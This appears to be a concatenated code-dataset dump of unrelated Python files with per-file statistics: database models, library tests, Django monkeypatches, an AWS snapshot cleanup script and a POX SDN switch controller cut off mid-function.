__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept_for_api_mv"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
def to_dict(self, return_level="full"):
response = self.concept.to_dict(return_level)
response["score"] = self.score
return response
def __repr__(self):
return "<WorkConcept ( {} ) {}>".format(self.paper_id, self.field_of_study)
class WorkConceptFull(db.Model):
__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
algorithm_version = db.Column(db.Numeric)
| 35.583333 | 122 | 0.736144 | from cached_property import cached_property
from app import db
class WorkConcept(db.Model):
__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept_for_api_mv"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
def to_dict(self, return_level="full"):
response = self.concept.to_dict(return_level)
response["score"] = self.score
return response
def __repr__(self):
return "<WorkConcept ( {} ) {}>".format(self.paper_id, self.field_of_study)
class WorkConceptFull(db.Model):
__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
algorithm_version = db.Column(db.Numeric)
| true | true |
1c332a2579cdb6149a4ddf3406958e98917add97 | 174 | py | Python | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_ConstantTrend_Seasonal_MonthOfYear_SVR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_ConstantTrend_Seasonal_MonthOfYear_SVR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | 1 | 2019-11-30T23:39:38.000Z | 2019-12-01T04:34:35.000Z | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_ConstantTrend_Seasonal_MonthOfYear_SVR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Integration'] , ['ConstantTrend'] , ['Seasonal_MonthOfYear'] , ['SVR'] ); | 43.5 | 96 | 0.770115 | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Integration'] , ['ConstantTrend'] , ['Seasonal_MonthOfYear'] , ['SVR'] ); | true | true |
1c332adf25a96537958b311ef5dcb734e23f444c | 1,047 | py | Python | seq2seq/metrics/test.py | gyy8426/TF_concaption | 7b3face47c96c885b2715605122328b7b6bef609 | [
"Apache-2.0"
] | null | null | null | seq2seq/metrics/test.py | gyy8426/TF_concaption | 7b3face47c96c885b2715605122328b7b6bef609 | [
"Apache-2.0"
] | null | null | null | seq2seq/metrics/test.py | gyy8426/TF_concaption | 7b3face47c96c885b2715605122328b7b6bef609 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
from tensorflow.contrib import metrics
from tensorflow.contrib.learn import MetricSpec
def accumulate_strings(values, name="strings"):
"""Accumulates strings into a vector.
Args:
values: A 1-d string tensor that contains values to add to the accumulator.
Returns:
A tuple (value_tensor, update_op).
"""
tf.assert_type(values, tf.string)
strings = tf.Variable(
name=name,
initial_value=[],
dtype=tf.string,
trainable=False,
collections=[],
validate_shape=True)
value_tensor = tf.identity(strings)
update_op = tf.assign(
ref=strings, value=tf.concat([strings, values], 0), validate_shape=False)
return value_tensor, update_op
a = ["as asd asd","asd sad","sadasd sd","a a a"]
b = [a,a,a]
print("!!!!!!!!!!b :",b)
c = accumulate_strings(b)
gpu_options = tf.GPUOptions(allow_growth=True)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
resluts = sess.run(c)
print("results :",resluts)
| 27.552632 | 80 | 0.674308 | import tensorflow as tf
from tensorflow.contrib import metrics
from tensorflow.contrib.learn import MetricSpec
def accumulate_strings(values, name="strings"):
tf.assert_type(values, tf.string)
strings = tf.Variable(
name=name,
initial_value=[],
dtype=tf.string,
trainable=False,
collections=[],
validate_shape=True)
value_tensor = tf.identity(strings)
update_op = tf.assign(
ref=strings, value=tf.concat([strings, values], 0), validate_shape=False)
return value_tensor, update_op
a = ["as asd asd","asd sad","sadasd sd","a a a"]
b = [a,a,a]
print("!!!!!!!!!!b :",b)
c = accumulate_strings(b)
gpu_options = tf.GPUOptions(allow_growth=True)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
resluts = sess.run(c)
print("results :",resluts)
| true | true |
1c332b281ac35c1405ffb25ee199f2a15ddae1dc | 1,261 | py | Python | python/lib/dcoscli/tests/integrations/test_auth.py | bamarni/dcos-core-cli | a550652477175f48708a361fd0d65e21d243cded | [
"Apache-2.0",
"MIT"
] | null | null | null | python/lib/dcoscli/tests/integrations/test_auth.py | bamarni/dcos-core-cli | a550652477175f48708a361fd0d65e21d243cded | [
"Apache-2.0",
"MIT"
] | null | null | null | python/lib/dcoscli/tests/integrations/test_auth.py | bamarni/dcos-core-cli | a550652477175f48708a361fd0d65e21d243cded | [
"Apache-2.0",
"MIT"
] | null | null | null | import os
import pytest
from dcos import constants
from dcoscli.test.common import assert_command, exec_command, update_config
@pytest.fixture
def env():
r = os.environ.copy()
r.update({constants.PATH_ENV: os.environ[constants.PATH_ENV]})
return r
def test_info():
stdout = b'Authenticate to DC/OS cluster\n'
assert_command(['dcos', 'auth', '--info'],
stdout=stdout)
def test_version():
stdout = b'dcos-auth version SNAPSHOT\n'
assert_command(['dcos', 'auth', '--version'],
stdout=stdout)
def test_logout_no_token(env):
with update_config("core.dcos_acs_token", None, env):
returncode, _, stderr = exec_command(
['dcos', 'config', 'show', 'core.dcos_acs_token'], env=env)
assert returncode == 1
assert stderr == b"Property 'core.dcos_acs_token' doesn't exist\n"
def test_logout_with_token(env):
with update_config("core.dcos_acs_token", "foobar", env):
stderr = b"[core.dcos_acs_token]: changed\n"
assert_command(
['dcos', 'config', 'set', 'core.dcos_acs_token', 'faketoken'],
stderr=stderr,
env=env)
assert_command(['dcos', 'auth', 'logout'],
env=env)
| 26.270833 | 75 | 0.620936 | import os
import pytest
from dcos import constants
from dcoscli.test.common import assert_command, exec_command, update_config
@pytest.fixture
def env():
r = os.environ.copy()
r.update({constants.PATH_ENV: os.environ[constants.PATH_ENV]})
return r
def test_info():
stdout = b'Authenticate to DC/OS cluster\n'
assert_command(['dcos', 'auth', '--info'],
stdout=stdout)
def test_version():
stdout = b'dcos-auth version SNAPSHOT\n'
assert_command(['dcos', 'auth', '--version'],
stdout=stdout)
def test_logout_no_token(env):
with update_config("core.dcos_acs_token", None, env):
returncode, _, stderr = exec_command(
['dcos', 'config', 'show', 'core.dcos_acs_token'], env=env)
assert returncode == 1
assert stderr == b"Property 'core.dcos_acs_token' doesn't exist\n"
def test_logout_with_token(env):
with update_config("core.dcos_acs_token", "foobar", env):
stderr = b"[core.dcos_acs_token]: changed\n"
assert_command(
['dcos', 'config', 'set', 'core.dcos_acs_token', 'faketoken'],
stderr=stderr,
env=env)
assert_command(['dcos', 'auth', 'logout'],
env=env)
| true | true |
1c332b4a13f5fefc7873b7b77a62dad93a489440 | 2,703 | py | Python | apps/sumo/monkeypatch.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | apps/sumo/monkeypatch.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | apps/sumo/monkeypatch.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | from django.forms import fields
from django.forms import widgets
# Monkey patch preserves the old values, so we can pick up any changes
# in CharField.widget_attrs and Field.widget_attrs
# paulc filed a Django ticket for it, #14884
field_widget_attrs = fields.Field.widget_attrs
charfield_widget_attrs = fields.CharField.widget_attrs
def required_field_attrs(self, widget):
"""This function is for use on the base Field class."""
attrs = field_widget_attrs(self, widget)
# required="required" isn't supported for groups of checkboxes.
if (self.required and (not 'required' in attrs) and
not isinstance(widget, widgets.CheckboxSelectMultiple)):
attrs['required'] = 'required'
return attrs
def required_char_field_attrs(self, widget, *args, **kwargs):
"""This function is for use on the CharField class."""
# We need to call super() here, since Django's CharField.widget_attrs
# doesn't call its super and thus won't use the required_field_attrs above.
attrs = super(fields.CharField, self).widget_attrs(widget, *args, **kwargs)
original_attrs = charfield_widget_attrs(self, widget) or {}
attrs.update(original_attrs)
return attrs
class DateWidget(fields.DateField.widget):
input_type = 'date'
class TimeWidget(fields.TimeField.widget):
input_type = 'time'
class URLWidget(fields.URLField.widget):
input_type = 'url'
class EmailWidget(fields.EmailField.widget):
input_type = 'email'
fields.Field.widget_attrs = required_field_attrs
fields.CharField.widget_attrs = required_char_field_attrs
fields.DateField.widget = DateWidget
fields.TimeField.widget = TimeWidget
fields.URLField.widget = URLWidget
fields.EmailField.widget = EmailWidget
# Workaround until https://code.djangoproject.com/ticket/16920 gets fixed.
from django.contrib.admin import util
from django.contrib.admin.util import NestedObjects
from django.db import models
def _collect(self, objs, source_attr=None, **kwargs):
for obj in objs:
if source_attr:
# We just added a default of None below and that gets around
# the problem.
self.add_edge(getattr(obj, source_attr, None), obj)
else:
self.add_edge(None, obj)
try:
return super(NestedObjects, self).collect(
objs, source_attr=source_attr, **kwargs)
except models.ProtectedError as e:
self.protected.update(e.protected_objects)
util.NestedObjects.collect = _collect
# Monkey patch for Bug 663236: Make |safe less necessary for form fields
from lib import safe_django_forms
safe_django_forms.monkeypatch()
# Monkey patch django's csrf
import session_csrf
session_csrf.monkeypatch()
| 31.8 | 79 | 0.740659 | from django.forms import fields
from django.forms import widgets
_widget_attrs = fields.Field.widget_attrs
charfield_widget_attrs = fields.CharField.widget_attrs
def required_field_attrs(self, widget):
attrs = field_widget_attrs(self, widget)
if (self.required and (not 'required' in attrs) and
not isinstance(widget, widgets.CheckboxSelectMultiple)):
attrs['required'] = 'required'
return attrs
def required_char_field_attrs(self, widget, *args, **kwargs):
# We need to call super() here, since Django's CharField.widget_attrs
attrs = super(fields.CharField, self).widget_attrs(widget, *args, **kwargs)
original_attrs = charfield_widget_attrs(self, widget) or {}
attrs.update(original_attrs)
return attrs
class DateWidget(fields.DateField.widget):
input_type = 'date'
class TimeWidget(fields.TimeField.widget):
input_type = 'time'
class URLWidget(fields.URLField.widget):
input_type = 'url'
class EmailWidget(fields.EmailField.widget):
input_type = 'email'
fields.Field.widget_attrs = required_field_attrs
fields.CharField.widget_attrs = required_char_field_attrs
fields.DateField.widget = DateWidget
fields.TimeField.widget = TimeWidget
fields.URLField.widget = URLWidget
fields.EmailField.widget = EmailWidget
from django.contrib.admin import util
from django.contrib.admin.util import NestedObjects
from django.db import models
def _collect(self, objs, source_attr=None, **kwargs):
for obj in objs:
if source_attr:
self.add_edge(getattr(obj, source_attr, None), obj)
else:
self.add_edge(None, obj)
try:
return super(NestedObjects, self).collect(
objs, source_attr=source_attr, **kwargs)
except models.ProtectedError as e:
self.protected.update(e.protected_objects)
util.NestedObjects.collect = _collect
from lib import safe_django_forms
safe_django_forms.monkeypatch()
import session_csrf
session_csrf.monkeypatch()
| true | true |
1c332bb22561fec9d19d2aa8adf27d639e17a682 | 2,277 | py | Python | tests/test_structures.py | davidfischer/requests | 7a404cf4ec5aac04d72dc507a981fee944b18cd8 | [
"Apache-2.0"
] | 10 | 2016-08-03T05:10:16.000Z | 2018-04-10T19:36:35.000Z | tests/test_structures.py | davidfischer/requests | 7a404cf4ec5aac04d72dc507a981fee944b18cd8 | [
"Apache-2.0"
] | 25 | 2016-08-24T00:19:19.000Z | 2021-04-17T14:20:24.000Z | tests/test_structures.py | davidfischer/requests | 7a404cf4ec5aac04d72dc507a981fee944b18cd8 | [
"Apache-2.0"
] | 2 | 2019-06-17T11:51:56.000Z | 2020-07-25T08:29:56.000Z | # coding: utf-8
import pytest
from requests.structures import CaseInsensitiveDict, LookupDict
class TestCaseInsensitiveDict:
@pytest.fixture(autouse=True)
def setup(self):
"""
CaseInsensitiveDict instance with "Accept" header.
"""
self.case_insensitive_dict = CaseInsensitiveDict()
self.case_insensitive_dict['Accept'] = 'application/json'
def test_list(self):
assert list(self.case_insensitive_dict) == ['Accept']
possible_keys = pytest.mark.parametrize('key', ('accept', 'ACCEPT', 'aCcEpT', 'Accept'))
@possible_keys
def test_getitem(self, key):
assert self.case_insensitive_dict[key] == 'application/json'
@possible_keys
def test_delitem(self, key):
del self.case_insensitive_dict[key]
assert key not in self.case_insensitive_dict
def test_lower_items(self):
assert list(self.case_insensitive_dict.lower_items()) == [('accept', 'application/json')]
def test_repr(self):
assert repr(self.case_insensitive_dict) == "{'Accept': 'application/json'}"
def test_copy(self):
copy = self.case_insensitive_dict.copy()
assert copy is not self.case_insensitive_dict
assert copy == self.case_insensitive_dict
@pytest.mark.parametrize(
'other, result', (
({'AccePT': 'application/json'}, True),
({}, False),
(None, False)
)
)
def test_instance_equality(self, other, result):
assert (self.case_insensitive_dict == other) is result
class TestLookupDict:
@pytest.fixture(autouse=True)
def setup(self):
"""
LookupDict instance with "bad_gateway" attribute.
"""
self.lookup_dict = LookupDict('test')
self.lookup_dict.bad_gateway = 502
def test_repr(self):
assert repr(self.lookup_dict) == "<lookup 'test'>"
get_item_parameters = pytest.mark.parametrize(
'key, value', (
('bad_gateway', 502),
('not_a_key', None)
)
)
@get_item_parameters
def test_getitem(self, key, value):
assert self.lookup_dict[key] == value
@get_item_parameters
def test_get(self, key, value):
assert self.lookup_dict.get(key) == value
| 28.4625 | 97 | 0.63856 |
import pytest
from requests.structures import CaseInsensitiveDict, LookupDict
class TestCaseInsensitiveDict:
@pytest.fixture(autouse=True)
def setup(self):
self.case_insensitive_dict = CaseInsensitiveDict()
self.case_insensitive_dict['Accept'] = 'application/json'
def test_list(self):
assert list(self.case_insensitive_dict) == ['Accept']
possible_keys = pytest.mark.parametrize('key', ('accept', 'ACCEPT', 'aCcEpT', 'Accept'))
@possible_keys
def test_getitem(self, key):
assert self.case_insensitive_dict[key] == 'application/json'
@possible_keys
def test_delitem(self, key):
del self.case_insensitive_dict[key]
assert key not in self.case_insensitive_dict
def test_lower_items(self):
assert list(self.case_insensitive_dict.lower_items()) == [('accept', 'application/json')]
def test_repr(self):
assert repr(self.case_insensitive_dict) == "{'Accept': 'application/json'}"
def test_copy(self):
copy = self.case_insensitive_dict.copy()
assert copy is not self.case_insensitive_dict
assert copy == self.case_insensitive_dict
@pytest.mark.parametrize(
'other, result', (
({'AccePT': 'application/json'}, True),
({}, False),
(None, False)
)
)
def test_instance_equality(self, other, result):
assert (self.case_insensitive_dict == other) is result
class TestLookupDict:
@pytest.fixture(autouse=True)
def setup(self):
self.lookup_dict = LookupDict('test')
self.lookup_dict.bad_gateway = 502
def test_repr(self):
assert repr(self.lookup_dict) == "<lookup 'test'>"
get_item_parameters = pytest.mark.parametrize(
'key, value', (
('bad_gateway', 502),
('not_a_key', None)
)
)
@get_item_parameters
def test_getitem(self, key, value):
assert self.lookup_dict[key] == value
@get_item_parameters
def test_get(self, key, value):
assert self.lookup_dict.get(key) == value
| true | true |
1c332bd5f1d5fd836763369f4e2ded2d5830f275 | 7,504 | py | Python | CSM_Cleanup.py | LGTOman/CSM_Cleanup | a28445c98213a39735c929825aff7a1a966f05b6 | [
"MIT"
] | null | null | null | CSM_Cleanup.py | LGTOman/CSM_Cleanup | a28445c98213a39735c929825aff7a1a966f05b6 | [
"MIT"
] | null | null | null | CSM_Cleanup.py | LGTOman/CSM_Cleanup | a28445c98213a39735c929825aff7a1a966f05b6 | [
"MIT"
] | null | null | null | import sys
import boto3
from botocore.exceptions import ClientError, EndpointConnectionError
from datetime import datetime, timedelta, timezone
import argparse
import pprint
product = "Dell EMC Cloud Snapshot Manager (aka Amazonite)"
defaultdays = 60
dryrun = False
regions = []
parser = argparse.ArgumentParser(description='Remove snapshots that were abandoned by {product}'.format(product=product))
parser.add_argument('--expire', metavar='DD', type=int, default=defaultdays,
help='expire {product} snapshots older than DD days. Default is {defaultdays} days.'.format(
product=product,
defaultdays=defaultdays,
))
parser.add_argument('--regions', action='store', nargs='+', default=['all'],
help='AWS regions to search for {product}. Default is all regions.'.format(product=product))
parser.add_argument('--service', action='store', default='all', choices=['EC2', 'RDS', 'all'],
help='Type of snapshot to remove (EC2|RDS|ALL) for {product}. Default is all types.'.format(product=product))
parser.add_argument('--dryrun', action='store_true',
help='Dry run only. Do not actually delete snapshots. Default is false.')
args = parser.parse_args()
days = args.expire
dryrun = args.dryrun
service = args.service
delete_time = datetime.now(timezone.utc) - timedelta(days=days)
filters = [{'Name':'tag:source', 'Values':['amazonite']}]
sumnum = {}
sumsize = {}
print ()
print ('Deleting any snapshots older than {days} days'.format(days=days))
print ()
def delsnap_ec2 (days, region) :
print ('Deleting {product} EC2 snapshots in region {region}'.format(
region = region,
product = product,
))
try :
ec2client = boto3.client('ec2', region_name=region)
except ClientError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
try :
ec2snapshots = ec2client.describe_snapshots(Filters=filters)['Snapshots']
except EndpointConnectionError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
deletion_counter = 0
size_counter = 0
for ec2snapshot in ec2snapshots:
start_time = ec2snapshot['StartTime']
if start_time < delete_time:
print ('Deleting {description} EC2 snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
id=ec2snapshot['SnapshotId'],
start_time=ec2snapshot['StartTime'],
volume_size=ec2snapshot['VolumeSize'],
description=ec2snapshot['Description'],
region=region,
))
# Just to make sure you're reading!
ec2 = boto3.resource('ec2', region_name=region)
ec2snap = ec2.Snapshot(ec2snapshot['SnapshotId'])
try:
ec2response = ec2snap.delete(
DryRun=dryrun
)
deletion_counter = deletion_counter + 1
size_counter = size_counter + ec2snapshot['VolumeSize']
except ClientError as err:
if err.response['Error']['Code'] == 'DryRunOperation' :
print (err.response['Error']['Message'])
deletion_counter = deletion_counter + 1
size_counter = size_counter + ec2snapshot['VolumeSize']
else :
print ('Unable to delete snapshot {snapshot}.'.format(snapshot=ec2snapshot['SnapshotId']))
print ("Error: {0}".format(err))
print (err.response['Error']['Code'])
return
print ('Deleted {number} EC2 snapshots totalling {size} GB in region {region}'.format(
number=deletion_counter,
size=size_counter,
region=region,
))
sumnum[region] = deletion_counter
sumsize[region] = size_counter
def delsnap_rds (days, region) :
print ('Deleting {product} RDS snapshots in region {region}'.format(
region=region,
product=product,
))
rdsclient = boto3.client('rds', region_name=region)
try :
rdssnapshots = rdsclient.describe_db_snapshots()['DBSnapshots']
except EndpointConnectionError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
deletion_counter = 0
size_counter = 0
for rdssnapshot in rdssnapshots:
#start_time = datetime.strptime(
# rdssnapshot['SnapshotCreateTime'],
# '%Y-%m-%dT%H:%M:%S.000Z'
#)
start_time = rdssnapshot['SnapshotCreateTime']
if start_time < delete_time and (
rdssnapshot['DBSnapshotIdentifier'].startswith('cloud-snapshot-manager-') or
rdssnapshot['DBSnapshotIdentifier'].startswith('amazonite-snapshot-')
):
print ('Deleting {engine} database {dbname} snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
id=rdssnapshot['DBSnapshotIdentifier'],
start_time=rdssnapshot['SnapshotCreateTime'],
volume_size=rdssnapshot['AllocatedStorage'],
engine=rdssnapshot['Engine'],
dbname=rdssnapshot['DBInstanceIdentifier'],
region=region,
))
deletion_counter = deletion_counter + 1
size_counter = size_counter + rdssnapshot['AllocatedStorage']
# Just to make sure you're reading!
if not dryrun:
rdsresponse = rdsclient.delete_db_snapshot(
DBSnapshotIdentifier=rdssnapshot['DBSnapshotIdentifier']
)
else :
print ('Request would have succeeded, but DryRun flag is set.')
print ('Deleted {number} RDS snapshots totalling {size} GB in region {region}'.format(
number=deletion_counter,
size=size_counter,
region=region,
))
sumnum[region] = deletion_counter
sumsize[region] = size_counter
if 'all' in args.regions :
ec2 = boto3.client('ec2')
response = ec2.describe_regions()
for region in response['Regions']:
regions.append(region['RegionName'])
regions.sort()
else :
regions = sorted(args.regions)
if (service == 'EC2') or (service == 'all') :
for region in regions :
delsnap_ec2 (days,region)
print ()
print ('Summary of EC2 removals:')
for region in regions :
print ('Deleted {number} snapshots totalling {size} GB in region {region}'.format(
number=sumnum[region],
size=sumsize[region],
region=region,
))
print ()
if (service == 'RDS') or (service == 'all') :
for region in regions :
delsnap_rds (days,region)
print ()
print ('Summary of RDS removals:')
for region in regions :
print ('Deleted {number} snapshots totaling {size} GB in region {region}'.format(
number=sumnum[region],
size=sumsize[region],
region=region,
))
print ()
| 34.902326 | 141 | 0.604211 | import sys
import boto3
from botocore.exceptions import ClientError, EndpointConnectionError
from datetime import datetime, timedelta, timezone
import argparse
import pprint
product = "Dell EMC Cloud Snapshot Manager (aka Amazonite)"
defaultdays = 60
dryrun = False
regions = []
parser = argparse.ArgumentParser(description='Remove snapshots that were abandoned by {product}'.format(product=product))
parser.add_argument('--expire', metavar='DD', type=int, default=defaultdays,
help='expire {product} snapshots older than DD days. Default is {defaultdays} days.'.format(
product=product,
defaultdays=defaultdays,
))
parser.add_argument('--regions', action='store', nargs='+', default=['all'],
help='AWS regions to search for {product}. Default is all regions.'.format(product=product))
parser.add_argument('--service', action='store', default='all', choices=['EC2', 'RDS', 'all'],
help='Type of snapshot to remove (EC2|RDS|ALL) for {product}. Default is all types.'.format(product=product))
parser.add_argument('--dryrun', action='store_true',
help='Dry run only. Do not actually delete snapshots. Default is false.')
args = parser.parse_args()
days = args.expire
dryrun = args.dryrun
service = args.service
delete_time = datetime.now(timezone.utc) - timedelta(days=days)
filters = [{'Name':'tag:source', 'Values':['amazonite']}]
sumnum = {}
sumsize = {}
print ()
print ('Deleting any snapshots older than {days} days'.format(days=days))
print ()
def delsnap_ec2 (days, region) :
print ('Deleting {product} EC2 snapshots in region {region}'.format(
region = region,
product = product,
))
try :
ec2client = boto3.client('ec2', region_name=region)
except ClientError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
try :
ec2snapshots = ec2client.describe_snapshots(Filters=filters)['Snapshots']
except EndpointConnectionError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
deletion_counter = 0
size_counter = 0
for ec2snapshot in ec2snapshots:
start_time = ec2snapshot['StartTime']
if start_time < delete_time:
print ('Deleting {description} EC2 snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
id=ec2snapshot['SnapshotId'],
start_time=ec2snapshot['StartTime'],
volume_size=ec2snapshot['VolumeSize'],
description=ec2snapshot['Description'],
region=region,
))
ec2 = boto3.resource('ec2', region_name=region)
ec2snap = ec2.Snapshot(ec2snapshot['SnapshotId'])
try:
ec2response = ec2snap.delete(
DryRun=dryrun
)
deletion_counter = deletion_counter + 1
size_counter = size_counter + ec2snapshot['VolumeSize']
except ClientError as err:
if err.response['Error']['Code'] == 'DryRunOperation' :
print (err.response['Error']['Message'])
deletion_counter = deletion_counter + 1
size_counter = size_counter + ec2snapshot['VolumeSize']
else :
print ('Unable to delete snapshot {snapshot}.'.format(snapshot=ec2snapshot['SnapshotId']))
print ("Error: {0}".format(err))
print (err.response['Error']['Code'])
return
print ('Deleted {number} EC2 snapshots totalling {size} GB in region {region}'.format(
number=deletion_counter,
size=size_counter,
region=region,
))
sumnum[region] = deletion_counter
sumsize[region] = size_counter
def delsnap_rds (days, region) :
print ('Deleting {product} RDS snapshots in region {region}'.format(
region=region,
product=product,
))
rdsclient = boto3.client('rds', region_name=region)
try :
rdssnapshots = rdsclient.describe_db_snapshots()['DBSnapshots']
except EndpointConnectionError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
deletion_counter = 0
size_counter = 0
for rdssnapshot in rdssnapshots:
#start_time = datetime.strptime(
# rdssnapshot['SnapshotCreateTime'],
# '%Y-%m-%dT%H:%M:%S.000Z'
#)
start_time = rdssnapshot['SnapshotCreateTime']
if start_time < delete_time and (
rdssnapshot['DBSnapshotIdentifier'].startswith('cloud-snapshot-manager-') or
rdssnapshot['DBSnapshotIdentifier'].startswith('amazonite-snapshot-')
):
print ('Deleting {engine} database {dbname} snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
id=rdssnapshot['DBSnapshotIdentifier'],
start_time=rdssnapshot['SnapshotCreateTime'],
volume_size=rdssnapshot['AllocatedStorage'],
engine=rdssnapshot['Engine'],
dbname=rdssnapshot['DBInstanceIdentifier'],
region=region,
))
deletion_counter = deletion_counter + 1
size_counter = size_counter + rdssnapshot['AllocatedStorage']
# Just to make sure you're reading!
if not dryrun:
rdsresponse = rdsclient.delete_db_snapshot(
DBSnapshotIdentifier=rdssnapshot['DBSnapshotIdentifier']
)
else :
print ('Request would have succeeded, but DryRun flag is set.')
print ('Deleted {number} RDS snapshots totalling {size} GB in region {region}'.format(
number=deletion_counter,
size=size_counter,
region=region,
))
sumnum[region] = deletion_counter
sumsize[region] = size_counter
if 'all' in args.regions :
ec2 = boto3.client('ec2')
response = ec2.describe_regions()
for region in response['Regions']:
regions.append(region['RegionName'])
regions.sort()
else :
regions = sorted(args.regions)
if (service == 'EC2') or (service == 'all') :
for region in regions :
delsnap_ec2 (days,region)
print ()
print ('Summary of EC2 removals:')
for region in regions :
print ('Deleted {number} snapshots totalling {size} GB in region {region}'.format(
number=sumnum[region],
size=sumsize[region],
region=region,
))
print ()
if (service == 'RDS') or (service == 'all') :
for region in regions :
delsnap_rds (days,region)
print ()
print ('Summary of RDS removals:')
for region in regions :
print ('Deleted {number} snapshots totaling {size} GB in region {region}'.format(
number=sumnum[region],
size=sumsize[region],
region=region,
))
print ()
| true | true |
1c332bf5fc4caea777c8a2827663952f8a4ac75d | 3,438 | py | Python | network/sdn/l2_pairs.py | sabertazimi/hust-lab | dc3425b6afe75ac3c1b48bb62fdd27c425284a0f | [
"MIT"
] | 29 | 2017-07-30T07:46:11.000Z | 2021-11-21T15:51:04.000Z | network/sdn/l2_pairs.py | sabertazimi/hust-lab | dc3425b6afe75ac3c1b48bb62fdd27c425284a0f | [
"MIT"
] | 2 | 2018-03-22T10:09:35.000Z | 2021-09-12T16:08:35.000Z | network/sdn/l2_pairs.py | sabertazimi/hust-lab | dc3425b6afe75ac3c1b48bb62fdd27c425284a0f | [
"MIT"
] | 9 | 2018-09-03T13:14:08.000Z | 2021-06-25T17:00:46.000Z | # Copyright 2012 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A super simple OpenFlow learning switch that installs rules for
each pair of L2 addresses.
"""
# These next two imports are common POX convention
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str, str_to_dpid
# Even a simple usage of the logger is much nicer than print!
log = core.getLogger()
# This table maps (switch,MAC-addr) pairs to the port on 'switch' at
# which we last saw a packet *from* 'MAC-addr'.
# (In this case, we use a Connection object for the switch.)
table = {}
# To send out all ports, we can use either of the special ports
# OFPP_FLOOD or OFPP_ALL. We'd like to just use OFPP_FLOOD,
# but it's not clear if all switches support this, so we make
# it selectable.
all_ports = of.OFPP_FLOOD
# Handle messages the switch has sent us because it has no
# matching rule.
def _handle_PacketIn (event):
# Parse packet
packet = event.parsed
# Learn the source
table[(event.connection, packet.src)] = event.port
dst_port = table.get((event.connection, packet.dst))
# Drop packets between h1 to h2
ip_match = of.ofp_match.from_packet(packet, event.port)
if (ip_match.nw_src == '192.168.1.1' and ip_match.nw_dst == '192.168.1.2') or (ip_match.nw_src == '192.168.1.2' and ip_match.nw_dst == '192.168.1.1'):
log.debug("Drop packets between h1 to h2")
msg = of.ofp_packet_out()
msg.buffer_id = event.ofp.buffer_id
msg.in_port = event.port
event.connection.send(msg)
return
if dst_port is None:
# We don't know where the destination is yet. So, we'll just
# send the packet out all ports (except the one it came in on!)
# and hope the destination is out there somewhere. :)
msg = of.ofp_packet_out(data = event.ofp)
msg.actions.append(of.ofp_action_output(port = all_ports))
event.connection.send(msg)
log.debug("Installing %s <-> all ports" % packet.src)
else:
# Since we know the switch ports for both the source and dest
# MACs, we can install rules for both directions.
msg = of.ofp_flow_mod()
msg.match.dl_dst = packet.src
msg.match.dl_src = packet.dst
